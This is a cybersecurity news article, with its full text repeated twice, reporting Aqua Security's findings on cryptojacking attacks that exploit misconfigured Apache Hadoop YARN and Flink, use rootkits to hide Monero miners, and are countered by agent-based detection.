Aqua Security reveals weaknesses in popular Apache products.
Cybersecurity researchers have discovered a new type of attack that exploits flaws in the configuration of Apache's Hadoop and Flink software for deploying cryptocurrency miners to target systems.
"This attack is particularly interesting because of the attackers' use of packagers and rootkits to hide malware, " note researchers from Aqua Security in their report published on January 8. Malware deletes the contents of certain directories and changes system configurations to evade detection.
The Apache Hadoop infection chain uses an incorrect configuration of the YARN resource manager (Yet Another Resource Negotiator), which is responsible for tracking resources in the cluster and scheduling applications.
In particular, this flaw allows a remote unauthorized attacker to execute arbitrary code using a specially created HTTP request, depending on the user's privileges on the node where the code is being executed.
Similar attacks on Apache Flink also target a misconfiguration that allows a remote attacker to execute code without any authentication.
These vulnerabilities are not new and have previously been exploited by groups motivated by financial gain, such as TeamTNT, which is known for attacking Docker and Kubernetes for cryptojacking and other malicious activities.
However, the latest attacks are notable for using rootkits to hide cryptocurrency mining processes after initially penetrating Hadoop and Flink applications.
First, the attacker sends an unauthenticated request to deploy a new application, and then sends a POST request to YARN asking it to open this new application with a specific command.
The command is used to clear the /tmp directory of all existing files, download a file called "dca" from a remote server and execute it, and then delete all files in the /tmp directory again.
The running code is a packaged ELF binary that loads two rootkits and a binary file of the Monero miner. To achieve attack persistence, a cron task is created to load and execute a shell script that deploys the "dca" binary file.
Analysis of the attacker's infrastructure shows that the server for downloading the payload was registered on October 31, 2023.
As a risk mitigation measure, organizations are encouraged to deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packaged binaries, and other suspicious activities.
Cybersecurity researchers have discovered a new type of attack that exploits flaws in the configuration of Apache's Hadoop and Flink software for deploying cryptocurrency miners to target systems.
"This attack is particularly interesting because of the attackers' use of packagers and rootkits to hide malware, " note researchers from Aqua Security in their report published on January 8. Malware deletes the contents of certain directories and changes system configurations to evade detection.
The Apache Hadoop infection chain uses an incorrect configuration of the YARN resource manager (Yet Another Resource Negotiator), which is responsible for tracking resources in the cluster and scheduling applications.
In particular, this flaw allows a remote unauthorized attacker to execute arbitrary code using a specially created HTTP request, depending on the user's privileges on the node where the code is being executed.
Similar attacks on Apache Flink also target a misconfiguration that allows a remote attacker to execute code without any authentication.
These vulnerabilities are not new and have previously been exploited by groups motivated by financial gain, such as TeamTNT, which is known for attacking Docker and Kubernetes for cryptojacking and other malicious activities.
However, the latest attacks are notable for using rootkits to hide cryptocurrency mining processes after initially penetrating Hadoop and Flink applications.
First, the attacker sends an unauthenticated request to deploy a new application, and then sends a POST request to YARN asking it to open this new application with a specific command.
The command is used to clear the /tmp directory of all existing files, download a file called "dca" from a remote server and execute it, and then delete all files in the /tmp directory again.
The running code is a packaged ELF binary that loads two rootkits and a binary file of the Monero miner. To achieve attack persistence, a cron task is created to load and execute a shell script that deploys the "dca" binary file.
Analysis of the attacker's infrastructure shows that the server for downloading the payload was registered on October 31, 2023.
As a risk mitigation measure, organizations are encouraged to deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packaged binaries, and other suspicious activities.
